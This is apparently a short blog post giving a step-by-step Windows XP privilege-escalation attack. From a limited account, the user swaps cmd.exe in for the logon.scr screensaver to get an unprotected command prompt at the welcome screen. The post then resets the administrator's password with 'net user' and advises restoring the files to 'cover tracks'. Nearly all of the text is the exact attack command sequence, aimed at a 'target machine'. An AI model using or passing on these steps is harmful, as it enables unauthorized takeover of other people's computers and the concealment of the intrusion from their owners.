If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack (creates the folder temphack)
copy logon.scr temphack\logon.scr (backsup logon.scr)
copy cmd.exe temphack\cmd.exe (backsup cmd.exe)
del logon.scr (deletes original logon.scr)
rename cmd.exe logon.scr (renames cmd.exe to logon.scr)
exit (quits dos)
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
By: dragonabv
Any updates, Errors, Suggestions or just general comments mail them to either.
Teachnix@gmail.com or dragonabv@live.com
No comments:
Post a Comment